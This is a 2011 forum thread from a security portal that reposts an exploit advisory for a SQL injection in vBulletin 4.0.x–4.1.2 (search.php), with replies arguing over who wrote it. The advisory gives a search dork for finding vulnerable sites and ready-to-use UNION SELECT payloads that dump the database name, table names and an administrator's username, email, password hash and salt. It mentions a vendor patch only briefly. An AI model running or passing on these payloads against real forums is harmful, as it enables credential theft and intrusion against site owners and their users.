Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
November 14, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 523
Members: 1
Total: 524

Online Now:
01: kolaz - Homepage
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> vBulletin Board -> vBulletin 4.1.2 SQL Injection
Post new topic  Reply to topic View previous topic :: View next topic 
vBulletin 4.1.2 SQL Injection
PostPosted: Sun May 22, 2011 11:46 am Reply with quote
VERTIGO
Advanced user
Advanced user
 
Joined: Sep 25, 2008
Posts: 87




Quote:
====================================================================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
# #
# 888 d8 888 _ 888 ,d d8 #
# e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ #
# d888 888 d888 888 888d8b 888 888b 888 888 #
# 8888 888 / 888 888 888Y88b 888 8888 888 888 #
# Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 #
# "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ #
# #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================

#[+] Discovered By : D4rkB1t
#[+] Site : NaN
#[+] support e-mail : d4rkb1t@live.com


Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

====================================================================
# 1337day.com [2011-5-21]
====================================================================
View user's profile Send private message
PostPosted: Sun May 22, 2011 3:25 pm Reply with quote
capt
Advanced user
Advanced user
 
Joined: Nov 04, 2008
Posts: 232




meh mise well watch the video he leaked from me...

http://www.youtube.com/watch?v=fR9RGCqIPkc
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sun May 22, 2011 11:44 pm Reply with quote
VERTIGO
Advanced user
Advanced user
 
Joined: Sep 25, 2008
Posts: 87




Bro i do not know who is original author i have these exploit long time before go public i know only that work
View user's profile Send private message
PostPosted: Mon May 23, 2011 1:28 pm Reply with quote
capt
Advanced user
Advanced user
 
Joined: Nov 04, 2008
Posts: 232




yea its all good, I had this public from the beginning. I made a private video along with it but it recently got leaked into the public along with the exploit.
View user's profile Send private message Visit poster's website MSN Messenger
vBulletin 4.1.2 SQL Injection
  www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.061 Seconds